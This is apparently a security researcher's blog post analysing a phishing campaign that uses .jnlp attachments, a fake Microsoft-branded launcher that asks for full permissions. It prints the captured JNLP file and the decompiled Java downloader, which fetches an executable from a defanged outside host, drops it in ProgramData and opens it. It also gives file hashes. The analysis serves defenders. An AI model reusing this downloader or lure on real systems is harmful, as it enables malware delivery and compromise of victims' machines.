When hunting, one thing that I like to learn is how attackers can be imaginative at deploying new techniques. I spotted some emails that had suspicious attachments based on the ‘.jnlp’ extension. I’m pretty sure that many people don’t know what’s their purpose and, if you don’t know them, you don’t have a look at them on your logs, SIEM, ... That makes them a good candidate to deliver malicious code!

Basically, a JNLP file[1] is... an XML file! It is created in the “Java Network Launching Protocol”. It contains all the required information to execute a Java program. Usually, it contains the address where to download the malicious applet and the initial class to run.

I did a quick analysis of one of the captured JNLP files:

<?xml version="1.0" encoding="utf-8"?> 
  <jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp">
  <information> 
    <title>Secure Document Reader</title> 
    <vendor>Microsoft</vendor> 
    <homepage href="wwww.microsoft.com"/> 
    <description>Microsoft Secure Document Reader v.4.016</description> 
  </information> 
  <security>
    <all-permissions/>
  </security>
  <resources> 
    <j2se version="1.6+" /> 
    <jar href="delivery.jar" />
  </resources> 
  <application-desc main-class="Secure_Document_Reader"> 
  </application-desc>
  wghjs100570 
</jnlp> 

The syntax is easy to understand. The payload will be called ‘delivery.jar’ (line 14) and downloaded from secured-doc-read[.].net (line 2). The main class is "Secure_Document_Reader" (line 16).

I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find a very simple code. Often malicious Java applets implement a RAT but here we faced the simple code of a downloader:

public class Secure_Document_Reader
{
  static BufferedInputStream frisco415;
  static FileOutputStream friekiegee;
  static String linkage9;

  public static void main(final String[] array) {
    frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg");
  }

  public static void frisco415(final String spec) {
    final File file = new File(Secure_Document_Reader.linkage9);
    try {
      Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream());
      Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9);
      final byte[] array = new byte[1024];
      int read;
      while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) {
        Secure_Document_Reader.friekiegee.write(array, 0, read);
      }
      Secure_Document_Reader.frisco415.close();
      Secure_Document_Reader.friekiegee.close();
    }
    catch (Exception ex) {}
    try {
      Desktop.getDesktop().open(file);
    }
    catch (Exception ex2) {}
  }

  static {
    Secure_Document_Reader.frisco415 = null;
    Secure_Document_Reader.friekiegee = null;
    Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe";
  }
}

The next stage is download from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as 'videodrx.exe". The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].

The usage of .jnlp files is a great way to bypass the first line of defenses (mail filters) because .jnlp files are text files and do not contain any executable code. Note that Java must be installed on the victim's computer to handle .jnlp files.

[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key